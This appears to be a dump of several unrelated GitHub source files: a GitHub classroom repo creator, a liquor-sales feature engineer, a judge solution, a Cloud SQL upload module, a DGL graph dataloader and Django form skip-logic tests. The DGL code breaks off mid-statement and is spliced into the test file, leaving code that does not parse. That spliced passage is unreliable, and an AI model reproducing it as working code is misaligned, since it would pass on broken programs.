help='Template repo used to create student repositories in format: OrgName/RepoName'\n)\nparser.add_argument(\n '--org_name',\n required=True,\n help='GitHub organization with student repositories (for multiples student repositories)'\n)\nparser.add_argument(\n '--repo_name',\n required=True,\n help='Name of the repo to be created'\n)\nparser.add_argument(\n '--private',\n type=lambda v: True if distutils.util.strtobool(v) else False,\n required=True,\n help='Repository privacy'\n)\nparser.add_argument(\n '--admin_collaborators',\n nargs='*',\n default=[],\n help='Collaborator usernames to receive admin access'\n)\nparser.add_argument(\n '--write_collaborators',\n nargs='*',\n default=[],\n help='Collaborator usernames to receive write access'\n)\nparser.add_argument(\n '--team_name',\n help='Team name to receive write access'\n)\n\n\ndef create_repo_from_template(token, template_repo_fullname, org_name, repo_name, description='', private=False):\n res = requests.post(\n url=f'https://api.github.com/repos/{template_repo_fullname}/generate',\n headers={\n 'Authorization': f'token {token}',\n 'Accept': 'application/vnd.github.baptiste-preview+json'\n },\n json={\n 'owner': org_name,\n 'name': repo_name,\n 'description': description,\n 'private': private\n }\n )\n if res.ok:\n print(f'{Fore.GREEN}Created repo: {repo_name}')\n else:\n g = github.Github(login_or_token=token)\n try:\n g.get_repo(full_name_or_id=f'{org_name}/{repo_name}')\n print(f'{Fore.YELLOW}Repo already exists: {repo_name}')\n except github.UnknownObjectException:\n print(f'{Fore.RED}Failed to create repo: {repo_name}')\n raise Exception(res.text)\n\n\ndef main(args):\n print('\\n\\n' + 'Creating student repositories'.center(80, '='))\n args = parser.parse_args(args)\n print('Args:\\n' + ''.join(f'\\t{k}: {v}\\n' for k, v in vars(args).items()))\n github_utils.verify_token(args.token)\n try:\n create_repo_from_template(\n token=args.token,\n template_repo_fullname=args.template_repo_fullname,\n org_name=args.org_name,\n repo_name=args.repo_name,\n description='Student repository',\n private=args.private\n )\n g = github.Github(login_or_token=args.token)\n repo = g.get_repo(full_name_or_id=f'{args.org_name}/{args.repo_name}')\n for col in args.admin_collaborators:\n repo.add_to_collaborators(col, permission='admin')\n for col in args.write_collaborators:\n repo.add_to_collaborators(col, permission='push')\n for team in g.get_organization(args.org_name).get_teams():\n if team.name == args.team_name:\n team.set_repo_permission(repo=repo, permission='push')\n\n except Exception as e:\n print(e)\n repo_is_template.main(['--token', args.token, '--repo_fullname', args.template_repo_fullname])\n\n\nif __name__ == '__main__':\n import sys\n\n main(sys.argv[1:])\n print(Style.RESET_ALL)\n","repo_name":"ClassroomSuite/ClassroomTools","sub_path":"classroom_tools/student_repositories/create_student_repo.py","file_name":"create_student_repo.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23247296635","text":"import pandas as pd\r\nimport numpy as np\r\nimport holidays\r\n\r\nclass LiquorSalesFeatureEngineer:\r\n def __init__(self, df):\r\n self.df = df\r\n \r\n def add_holiday_flags_working(self):\r\n # Ensure 'year' and 'month' columns are of type int\r\n \r\n self.df['year'] = self.df['year'].astype(int)\r\n self.df['month'] = self.df['month'].astype(int)\r\n #years = df['year'].unique().tolist() \r\n\r\n # Retrieve US holidays for 
the unique years in the dataset\r\n us_holidays = holidays.UnitedStates(years=list(self.df['year'].unique()))\r\n\r\n # Using dictionary comprehension to create a map of year-month to holidays in that month\r\n month_holiday_map = {(date.year, date.month): holiday for date, holiday in us_holidays.items()}\r\n\r\n # Add flags for major US holidays\r\n self.df['is_new_year'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"New Year's Day\" else 0, axis=1)\r\n self.df['is_independence_day'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Independence Day\" else 0, axis=1)\r\n self.df['is_christmas'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Christmas Day\" else 0, axis=1)\r\n self.df['is_thanksgiving'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Thanksgiving\" else 0, axis=1)\r\n\r\n return self.df\r\n\r\n\r\n def add_holiday_flags(self): \r\n self.df['is_new_year'] = self.df.apply(lambda x: 1 if x['month'] == 1 else 0, axis=1)\r\n self.df['is_independence_day'] = self.df.apply(lambda x: 1 if x['month'] == 7 else 0, axis=1)\r\n self.df['is_christmas'] = self.df.apply(lambda x: 1 if x['month'] == 12 else 0, axis=1)\r\n self.df['is_thanksgiving'] = self.df.apply(lambda x: 1 if x['month'] == 11 else 0, axis=1)\r\n return self.df\r\n\r\n \r\n def add_seasonality_working(self):\r\n # Seasonality for Mid-west USA\r\n conditions = [\r\n (self.df['month'].isin([12, 1, 2, 3])), # Long winter\r\n (self.df['month'].isin([4, 5])), # Spring\r\n (self.df['month'].isin([6, 7, 8])), # Summer\r\n (self.df['month'].isin([9, 10, 11])) # Fall\r\n ]\r\n\r\n seasons = ['winter', 'spring', 'summer', 'fall']\r\n\r\n self.df['season'] = np.select(conditions, seasons, default='unknown')\r\n \r\n return self.df\r\n \r\n def add_seasonality(self):\r\n # Seasonality for Mid-west USA\r\n conditions = [\r\n (self.df['month'].isin([12, 1, 2, 3])), # Long winter\r\n (self.df['month'].isin([4, 5])), # Spring\r\n (self.df['month'].isin([6, 7, 8])), # Summer\r\n (self.df['month'].isin([9, 10, 11])) # Fall\r\n ]\r\n\r\n seasons = ['winter', 'spring', 'summer', 'fall']\r\n\r\n self.df['season'] = np.select(conditions, seasons, default='unknown')\r\n\r\n # Adding one-hot encoded season columns\r\n self.df['is_winter'] = np.where(self.df['season'] == 'winter', 1, 0)\r\n self.df['is_spring'] = np.where(self.df['season'] == 'spring', 1, 0)\r\n self.df['is_summer'] = np.where(self.df['season'] == 'summer', 1, 0)\r\n self.df['is_fall'] = np.where(self.df['season'] == 'fall', 1, 0)\r\n\r\n return self.df\r\n \r\n \r\n def add_profit(self):\r\n self.df['profit'] = ( self.df['state_bottle_retail'] - self.df['state_bottle_cost']) * self.df['bottles_sold']\r\n self.df['profit'] = self.df['profit'].astype(float)\r\n \r\n def transform(self):\r\n self.add_holiday_flags()\r\n self.add_seasonality()\r\n self.add_profit()\r\n return self.df\r\n\r\n# Usage:\r\n#feature_engineer = LiquorSalesFeatureEngineer(df)\r\n#df_transformed = feature_engineer.transform()\r\n","repo_name":"kathiresanrs/iForecast-ProductDemandForecasting","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"403294690","text":"# URI Online Judge | 2139\n# ano bissexto -- natal no dia 360\nwhile True:\n try:\n dias31 = [1, 3, 5, 7, 8, 10, 
12]\n dias30 = [4, 6, 9, 11]\n mes, dia = [int(x) for x in input().split()]\n if mes == 12 and dia == 24:\n print('E vespera de natal!')\n elif mes == 12 and dia == 25:\n print('E natal!')\n elif mes == 12 and dia >25:\n print('Ja passou!')\n else:\n dias = 0\n for i in range(1, mes):\n if i in dias31:\n dias += 31\n elif i in dias30:\n dias+= 30\n else:\n dias+= 29\n dias+= dia \n print(f'Faltam {360-dias} dias para o natal!')\n except EOFError:\n break","repo_name":"sammycosta/uri-python","sub_path":"uri_2139.py","file_name":"uri_2139.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71741642794","text":"\"\"\"\nThis update_psql module uses 2 functions to connect and update to the GCP Cloud SQL PostgreSQL database.\nFor now, this serves no real purpose other than training me to interact with a SQL database in Python.\n\nFunctions:\n - conn_to_psql : Connects to the GCP Cloud SQL PostgreSQL database.\n - upload_to_psql : Uploads data to the GCP Cloud SQL PostgreSQL database.\n\"\"\"\n\n\nimport logging\n\nimport os\nfrom google.cloud.sql.connector import Connector\nimport pandas as pd\nimport sqlalchemy\nfrom modules.gcp_interactions import get_secret\n\n\n\n\nPROJECT_ID = os.environ[\"PROJECT_ID\"]\nSQL_INSTANCE_CONNECTION_NAME1 = get_secret(PROJECT_ID, \"SQL_INSTANCE_CONNECTION_NAME1\")\nSQL_DB_USER1 = get_secret(PROJECT_ID, \"SQL_DB_USER1\")\nSQL_DB_PASS1 = get_secret(PROJECT_ID, \"SQL_DB_PASS1\")\nSQL_DB_NAME1 = get_secret(PROJECT_ID, \"SQL_DB_NAME1\")\nSQL_DB_TABLE_NAME1 = get_secret(PROJECT_ID, \"SQL_DB_TABLE_NAME1\")\n\n\ndef conn_to_psql():\n \"\"\"Connects to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Connecting to database...\")\n \n connector = Connector()\n\n def getconn_SQL():\n conn = connector.connect(\n SQL_INSTANCE_CONNECTION_NAME1,\n \"pg8000\",\n user=SQL_DB_USER1,\n password=SQL_DB_PASS1,\n db=SQL_DB_NAME1,\n )\n return conn\n\n # create connection pool with 'creator' argument to our connection object\n try:\n pool = sqlalchemy.create_engine(\n \"postgresql+pg8000://\",\n creator=getconn_SQL,\n )\n logging.info(\"Connection successfull!\")\n except Exception as e:\n logging.warning(f\"Connection to GCP database failed!\\nThis exception was raised : {e}\")\n \n return pool, connector\n\n\ndef upload_to_psql(pool):\n \"\"\"Upload data to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Uploading data to GCP database...\")\n \n df_final_data = pd.read_csv(\"data/final_data.csv\")\n df_final_data.to_sql(SQL_DB_TABLE_NAME1, pool, if_exists=\"replace\", index=False)\n\n # Verify data has been inserted\n query = f\"SELECT * FROM {SQL_DB_TABLE_NAME1}\"\n result = pd.read_sql(query, pool)\n if result is not None:\n logging.info(\"Data inserted.\")\n print(\"SQL query result : \\n\")\n print(result)\n\ndef close_conn_to_sql(pool, connector):\n \"\"\"Closes the connection to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Closing connection to database...\")\n \n connector.close() # clean up the Connector object only used to authenticate the user\n pool.dispose() # close the database connections managed by the connection pool\n \n logging.info(\"Connection closed.\")","repo_name":"AlexandreGarito/data-pipeline-demo-1","sub_path":"modules/update_psql.py","file_name":"update_psql.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} 
+{"seq_id":"70844861994","text":"import torch\nimport dgl\nimport numpy\nimport time\nfrom itertools import islice\nfrom statistics import mean\nfrom multiprocessing import Manager, Pool\nfrom multiprocessing import Process, Value, Array\nfrom graph_partitioner import Graph_Partitioner\nfrom my_utils import gen_batch_output_list\nfrom draw_graph import draw_graph, generate_interactive_graph\n\ndef unique_tensor_item(combined):\n\tuniques, counts = combined.unique(return_counts=True)\n\treturn uniques.type(torch.long)\n\n\ndef unique_edges(edges_list):\n\ttemp = []\n\tfor i in range(len(edges_list)):\n\t\ttt = edges_list[i] # tt : [[],[]]\n\t\tfor j in range(len(tt[0])):\n\t\t\tcur = (tt[0][j], tt[1][j])\n\t\t\tif cur not in temp:\n\t\t\t\ttemp.append(cur)\n\t# print(temp) # [(),(),()...]\n\tres_ = list(map(list, zip(*temp))) # [],[]\n\tres = tuple(sub for sub in res_)\n\treturn res\n\n\ndef generate_random_mini_batch_seeds_list(OUTPUT_NID, args):\n\t'''\n\tParameters\n\t----------\n\tOUTPUT_NID: final layer output nodes id (tensor)\n\targs : all given parameters collection\n\n\tReturns\n\t-------\n\t'''\n\tselection_method = args.selection_method\n\tmini_batch = args.batch_size\n\tfull_len = len(OUTPUT_NID) # get the total number of output nodes\n\tif selection_method == 'random':\n\t\tindices = torch.randperm(full_len) # get a permutation of the index of output nid tensor (permutation of 0~n-1)\n\telse: #selection_method == 'range'\n\t\tindices = torch.tensor(range(full_len))\n\n\toutput_num = len(OUTPUT_NID.tolist())\n\tmap_output_list = list(numpy.array(OUTPUT_NID)[indices.tolist()])\n\tbatches_nid_list = [map_output_list[i:i + mini_batch] for i in range(0, len(map_output_list), mini_batch)]\n\tweights_list = []\n\tfor i in batches_nid_list:\n\t\ttemp = len(i)/output_num\n\t\tweights_list.append(len(i)/output_num)\n\t\t\n\treturn batches_nid_list, weights_list\n\n\ndef get_global_graph_edges_ids_2(raw_graph, cur_subgraph):\n\tsrc = cur_subgraph.edges()[0]\n\tdst = cur_subgraph.edges()[1]\n\t\n\tsrc = src.long()\n\tdst = dst.long()\n\t\n\traw_src, raw_dst = cur_subgraph.ndata[dgl.NID]['_N_src'][src], cur_subgraph.ndata[dgl.NID]['_N_dst'][dst]\n\n\tglobal_graph_eids_raw = raw_graph.edge_ids(raw_src, raw_dst)\n\t# https://docs.dgl.ai/en/0.4.x/generated/dgl.DGLGraph.edge_ids.html#dgl.DGLGraph.edge_ids\n\n\treturn global_graph_eids_raw, (raw_src, raw_dst)\n\n\ndef get_global_graph_edges_ids(raw_graph, cur_block):\n\t'''\n\t\tParameters\n\t\t----------\n\t\traw_graph : graph\n\t\tcur_block: (local nids, local nids): (tensor,tensor)\n\n\t\tReturns\n\t\t-------\n\t\tglobal_graph_edges_ids: [] current block edges global id list\n\t'''\n\n\tsrc, dst = cur_block.all_edges(order='eid')\n\tsrc = src.long()\n\tdst = dst.long()\n\t# print(src.tolist())\n\t# print(dst.tolist())\n\traw_src, raw_dst = cur_block.srcdata[dgl.NID][src], cur_block.dstdata[dgl.NID][dst]\n\t# print(raw_src.tolist())\n\t# print(raw_dst.tolist())\n\tglobal_graph_eids_raw = raw_graph.edge_ids(raw_src, raw_dst)\n\t# https://docs.dgl.ai/en/0.4.x/generated/dgl.DGLGraph.edge_ids.html#dgl.DGLGraph.edge_ids\n\n\treturn global_graph_eids_raw, (raw_src, raw_dst)\n\n\ndef generate_one_block(raw_graph, global_eids, global_srcnid):\n\t'''\n\n\tParameters\n\t----------\n\tG global graph DGLGraph\n\teids cur_batch_subgraph_global eid tensor int64\n\n\tReturns\n\t-------\n\n\t'''\n\t_graph = dgl.edge_subgraph(raw_graph, global_eids)\n\tedge_dst_list = _graph.edges()[1].tolist()\n\tdst_local_nid_list = list(set(edge_dst_list))\n\tnew_block = 
dgl.to_block(_graph, dst_nodes=torch.tensor(dst_local_nid_list, dtype=torch.long))\n\n\tglobal_nid_list = _graph.ndata[dgl.NID].tolist()\n\tblock_nid_list = new_block.ndata[dgl.NID]['_N'].tolist()\n\tblock_dst_nid_list = new_block.dstdata[dgl.NID].tolist()\n\n\tfinal_nid_list = [global_nid_list[i] for i in block_nid_list] # mapping global graph nid <--- block local nid\n\tfinal_dst_nid_list = [global_nid_list[i] for i in block_dst_nid_list]\n\n\tnew_block.ndata[dgl.NID] = {'_N': torch.tensor(final_nid_list, dtype=torch.long)}\n\tnew_block.dstdata[dgl.NID] = torch.tensor(final_dst_nid_list, dtype=torch.long)\n\tnew_block.srcdata[dgl.NID] = torch.tensor(final_nid_list, dtype=torch.long)\n\n\treturn new_block\n\ndef check_connections_0(batched_nodes_list, current_layer_subgraph):\n\tres=[]\n\t\n\t# multi-layers model: current_layer_subgraph, here\n\tsrc_nid_list = current_layer_subgraph.srcdata['_ID'].tolist()\n\t# print('\\n ************************************* src nid of current layer subgraph')\n\t# print(src_nid_list)\n\tdict_nid_2_local = {src_nid_list[i]: i for i in range(0, len(src_nid_list))}\n\t# print('\\n ************************************* dict_nid_2_local')\n\teids_global_list = current_layer_subgraph.edata['_ID'].tolist()\n\t\n\n\tfor step, output_nid in enumerate(batched_nodes_list):\n\t\t# print(step, ' -----------------------------------------------step ')\n\t\t# in current layer subgraph, only has src and dst nodes,\n\t\t# and src nodes includes dst nodes, src nodes equals dst nodes.\n\t\tgiven_nid_list_ = output_nid\n\t\t# given_nid_list_ = output_nid.tolist()\n\t\tlocal_given_output_nids = list(map(dict_nid_2_local.get, given_nid_list_))\n\t\tlocal_in_edges_tensor = current_layer_subgraph.in_edges(local_given_output_nids, form='all')\n\n\t\t# get local srcnid and dstnid from subgraph\n\t\tmini_batch_srcid_local_list = list(local_in_edges_tensor)[0].tolist()\n\t\tsrcid_list = list(numpy.array(src_nid_list)[mini_batch_srcid_local_list])\n\t\t# map local srcnid , dstnid, eid to global\n\t\teid_local_list = list(local_in_edges_tensor)[2]\n\t\teid_list = list(numpy.array(eids_global_list)[eid_local_list.tolist()])\n\t\tglobal_eid_tensor = torch.tensor(eid_list, dtype=torch.long)\n\t\tsrcid = torch.tensor(list(set(given_nid_list_+ srcid_list)), dtype=torch.long)\n\t\t\n\n\t\tres.append((srcid, output_nid, global_eid_tensor))\n\t# print('res----------------------------------------')\n\t# print(len(shared_list))\n\treturn res\n\n\ndef generate_blocks_for_one_layer(raw_graph, block_2_graph, batches_nid_list):\n\n\tblocks = []\n\tcheck_connection_time = []\n\tblock_generation_time = []\n\n\tt1= time.time()\n\tbatches_temp_res_list = check_connections_0(batches_nid_list, block_2_graph)\n\tt2 = time.time()\n\tcheck_connection_time.append(t2-t1) #------------------------------------------\n\tsrc_list=[]\n\tdst_list=[]\n\n\tfor step, (srcnid, dstnid, current_block_global_eid) in enumerate(batches_temp_res_list):\n\t\t# print('batch ' + str(step) + '-' * 30)\n\t\tt_ = time.time()\n\t\tcur_block = generate_one_block(raw_graph, current_block_global_eid, srcnid)\n\t\tt__=time.time()\n\t\tblock_generation_time.append(t__-t_) #------------------------------------------\n\t\t\n\t\tblocks.append(cur_block)\n\t\tsrc_list.append(srcnid)\n\t\tdst_list.append(dstnid)\n\n\t\t# data_loader.append((srcnid, dstnid, [cur_block]))\n\t\t\n\t# print(\"\\nconnection checking time \" + str(sum(check_connection_time)))\n\t# print(\"total of block generation time \" + str(sum(block_generation_time)))\n\t# 
print(\"average of block generation time \" + str(mean(block_generation_time)))\n\tconnection_time = sum(check_connection_time)\n\tblock_gen_time = sum(block_generation_time)\n\tmean_block_gen_time = mean(block_generation_time)\n\n\n\treturn blocks, src_list,dst_list,(connection_time, block_gen_time, mean_block_gen_time)\n\n\n\ndef generate_dataloader_w_partition(raw_graph, block_to_graph_list, args):\n\tfor layer, block_to_graph in enumerate(block_to_graph_list):\n\t\t\n\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, block_to_graph)\n\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\tif layer == 0:\n\t\t\tmy_graph_partitioner=Graph_Partitioner(block_to_graph, args) #init a graph partitioner object\n\t\t\tbatched_output_nid_list,weights_list,batch_list_generation_time, p_len_list=my_graph_partitioner.init_graph_partition()\n\n\t\t\tprint('partition_len_list')\n\t\t\tprint(p_len_list)\n\t\t\targs.batch_size=my_graph_partitioner.batch_size\n\t\t\t\n\t\t\tblocks, src_list, dst_list, time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, batched_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\t# batch_list_generation_time = t1 - tt\n\t\t\ttime_2 = (connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time)\n\t\telse:\n\t\t\treturn\n\tdata_loader=[]\n\t# TODO\n\treturn data_loader, weights_list, time_2\n\ndef gen_grouped_dst_list(prev_layer_blocks):\n\tpost_dst=[]\n\tfor block in prev_layer_blocks:\n\t\tsrc_nids = block.srcdata['_ID'].tolist()\n\t\tpost_dst.append(src_nids)\n\treturn post_dst # return next layer's dst nids(equals prev layer src nids)\n\ndef generate_dataloader_wo_gp_Pure_range(raw_graph, block_to_graph_list, args):\n\tdata_loader=[]\n\tweights_list=[]\n\tnum_batch=0\n\tblocks_list=[]\n\tfinal_dst_list =[]\n\tfinal_src_list=[]\n\tprev_layer_blocks=[]\n\tt_2_list=[]\n\t# prev_layer_src_list=[]\n\t# prev_layer_dst_list=[]\n\tfor layer, block_to_graph in enumerate(block_to_graph_list):\n\t\tif layer ==0:\n\t\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, block_to_graph)\n\t\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\t\tdst_nids=block_to_graph.dstdata['_ID'].tolist()\n\t\t\t# src_nids=block_to_graph.srcdata['_ID'].tolist()\n\t\t\t# print('time of batches_nid_list generation : ' + str(t1 - tt) + ' sec')\n\t\t\tt1=time.time()\n\t\t\tindices = [i for i in range(len(dst_nids))]\n\t\t\tbatched_output_nid_list, w_list=gen_batch_output_list(dst_nids,indices,args.batch_size)\n\t\t\ttt=time.time()\n\t\t\tweights_list=w_list\n\t\t\tnum_batch=len(batched_output_nid_list)\n\t\t\tprint('layer ', layer)\n\t\t\tprint('\\tselection method range initialization spend ', time.time()-t1)\n\t\t\t# block 0 : (src_0, dst_0); block 1 : (src_1, dst_1);.......\n\t\t\tblocks, src_list, dst_list,time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, batched_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\tbatch_list_generation_time = tt - t1\n\t\t\ttime_2 = [connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time]\n\t\t\tt_2_list.append(time_2)\n\t\t\tprev_layer_blocks=blocks\n\t\t\t# prev_layer_dst_list=dst_list\n\t\t\t# prev_layer_src_list=src_list\n\n\t\t\tblocks_list.append(blocks)\n\t\t\tfinal_dst_list=dst_list\n\n\t\telse:\n\t\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, 
block_to_graph)\n\t\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\t\toutput_nids=block_to_graph.dstdata['_ID']\n\t\t\t# print('time of batches_nid_list generation : ' + str(t1 - tt) + ' sec')\n\t\t\tt1=time.time()\n\t\t\t\n\t\t\tgrouped_output_nid_list=gen_grouped_dst_list(prev_layer_blocks)\n\t\t\ttt=time.time()\n\t\t\tprint('layer ',layer)\n\t\t\tprint('\\tselection method range initialization spend ', time.time()-t1)\n\t\t\t\n\t\t\tblocks, src_list, dst_list, time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, grouped_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\tbatch_list_generation_time = tt-t1\n\t\t\ttime_2 = [connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time]\n\t\t\tt_2_list.append(time_2)\n\n\t\t\tif layer 512)\n\n def test_choices_updated_from_streamfield_on_save(self):\n self.assertEqual(\n ','.join(self.field_choices),\n self.choice_field.choices\n )\n\n new_choices = ['this', 'is', 'new']\n self.choice_field.skip_logic = skip_logic_data(new_choices)\n self.choice_field.save()\n\n self.assertEqual(','.join(new_choices), self.choice_field.choices)\n\n def test_normal_field_is_not_skippable(self):\n self.assertFalse(self.normal_field.has_skipping)\n\n def test_positive_number_field_is_not_skippable(self):\n self.assertFalse(self.positive_number_field.has_skipping)\n\n def test_only_next_doesnt_skip(self):\n self.assertFalse(self.choice_field.has_skipping)\n\n def test_other_logic_does_skip(self):\n self.choice_field.skip_logic = skip_logic_data(['choice'], ['end'])\n self.choice_field.save()\n self.assertTrue(self.choice_field.has_skipping)\n\n\nclass TestSkipLogicBlock(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.form = MoloFormPage(\n title='Test Form',\n slug='test-form',\n )\n self.section_index.add_child(instance=self.form)\n self.form.save_revision().publish()\n\n def test_form_raises_error_if_no_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'next form',\n SkipState.FORM,\n form=None,\n )\n with self.assertRaises(ValidationError):\n block.clean(data)\n\n def test_form_passes_with_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'next form',\n SkipState.FORM,\n form=self.form.id,\n )\n cleaned_data = block.clean(data)\n self.assertEqual(cleaned_data['skip_logic'], SkipState.FORM)\n self.assertEqual(cleaned_data['form'], self.form)\n\n def test_question_raises_error_if_no_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'a question',\n SkipState.QUESTION,\n question=None,\n )\n with self.assertRaises(ValidationError):\n block.clean(data)\n\n def test_question_passes_with_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'a question',\n SkipState.QUESTION,\n question=1,\n )\n cleaned_data = block.clean(data)\n self.assertEqual(cleaned_data['skip_logic'], SkipState.QUESTION)\n self.assertEqual(cleaned_data['question'], 1)\n\n\nclass TestPageBreakWithTwoQuestionsInOneStep(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.main = Main.objects.all().first()\n self.language_setting = Languages.objects.create(\n site_id=self.main.get_site().pk)\n self.english = SiteLanguageRelation.objects.create(\n language_setting=self.language_setting,\n locale='en',\n is_active=True)\n self.login()\n\n def test_setup(self):\n self.assertEqual(1, FormsIndexPage.objects.count())\n\n create_form()\n\n self.assertEqual(1, 
MoloFormPage.objects.count())\n\n def test_setup2(self):\n create_form([{\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": True,\n }, ])\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n def test_two_questions_in_one_step_when_one_required(self):\n create_form([\n {\n \"question\": \"I feel I can be myself around other people\",\n \"type\": 'radio',\n \"choices\": [\"agree\", \"disagree\"],\n \"required\": True,\n \"page_break\": True,\n },\n {\n \"question\": \"I can speak my opinion\",\n \"type\": 'radio',\n \"choices\": [\"yes\", \"no\", \"maybe\"],\n \"required\": True,\n \"page_break\": False,\n },\n {\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": True,\n },\n {\n \"question\":\n \"I am able to stand up for myself and what I believe in\",\n \"type\": 'radio',\n \"choices\": [\"Strongly disagree\", \"I don't know\"],\n \"required\": True,\n \"page_break\": False,\n },\n ],\n language=self.english)\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n form = MoloFormPage.objects.last()\n\n self.assertEqual(4, form.form_fields.count())\n\n field_1 = form.form_fields.all()[0]\n\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['choice'],\n \"agree\"\n )\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_1.sort_order, 0)\n\n field_2 = form.form_fields.all()[1]\n\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['choice'],\n \"yes\"\n )\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_2.sort_order, 1)\n\n field_3 = form.form_fields.all()[2]\n self.assertEqual(field_3.sort_order, 2)\n\n field_4 = form.form_fields.all()[3]\n\n self.assertEqual(\n field_4.skip_logic.stream_data[0]['value']['choice'],\n \"Strongly disagree\"\n )\n self.assertEqual(\n field_4.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_4.sort_order, 3)\n\n response = self.client.get(form.url)\n\n self.assertContains(response, field_1.label)\n self.assertContains(response, 'Next Question')\n self.assertContains(response, 'action=\"' + form.url + '?p=2\"')\n\n response = self.client.post(form.url + '?p=2', {\n field_1.clean_name:\n field_1.skip_logic.stream_data[0]['value']['choice'],\n })\n self.assertContains(response, field_2.label)\n self.assertContains(response, field_3.label)\n self.assertContains(response, 'action=\"' + form.url + '?p=3\"')\n\n response = self.client.post(form.url + '?p=3', {\n field_3.clean_name: 'because ;)',\n }, follow=True)\n\n self.assertContains(response, \"This field is required\")\n self.assertContains(response, 'action=\"' + form.url + '?p=3\"')\n\n response = self.client.post(form.url + '?p=3', {\n field_2.clean_name:\n field_2.skip_logic.stream_data[0]['value']['choice'],\n field_3.clean_name: 'because ;)',\n })\n\n self.assertContains(response, field_4.label)\n\n response = self.client.post(form.url + '?p=4', follow=True)\n self.assertContains(response, \"This field is required\")\n\n response = self.client.post(form.url + '?p=4', {\n field_4.clean_name:\n field_4.skip_logic.stream_data[0]['value']['choice'],\n }, follow=True)\n\n self.assertContains(response, form.thank_you_text)\n\n def test_two_questions_in_last_step_when_one_required(self):\n create_form([\n {\n \"question\": \"I 
feel I can be myself around other people\",\n \"type\": 'radio',\n \"choices\": [\"agree\", \"disagree\"],\n \"required\": True,\n \"page_break\": True,\n },\n {\n \"question\": \"I can speak my opinion\",\n \"type\": 'radio',\n \"choices\": [\"yes\", \"no\", \"maybe\"],\n \"required\": True,\n \"page_break\": False,\n },\n {\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": False,\n },\n ])\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n form = MoloFormPage.objects.last()\n\n self.assertEqual(3, form.form_fields.count())\n\n field_1 = form.form_fields.all()[0]\n\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['choice'],\n \"agree\"\n )\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_1.sort_order, 0)\n\n field_2 = form.form_fields.all()[1]\n\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['choice'],\n \"yes\"\n )\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_2.sort_order, 1)\n\n field_3 = form.form_fields.all()[2]\n self.assertEqual(field_3.sort_order, 2)\n\n response = self.client.get(form.url)\n\n self.assertContains(response, field_1.label)\n self.assertContains(response, 'Next Question')\n\n response = self.client.post(form.url + '?p=2', {\n field_1.clean_name:\n field_1.skip_logic.stream_data[0]['value']['choice'],\n })\n self.assertContains(response, field_2.label)\n self.assertContains(response, field_3.label)\n\n response = self.client.post(form.url + '?p=3', {\n field_3.clean_name: 'because ;)',\n }, follow=True)\n\n self.assertContains(response, \"This field is required\")\n response = self.client.post(form.url + '?p=3', {\n field_2.clean_name:\n field_2.skip_logic.stream_data[0]['value']['choice'],\n field_3.clean_name: 'because ;)',\n }, 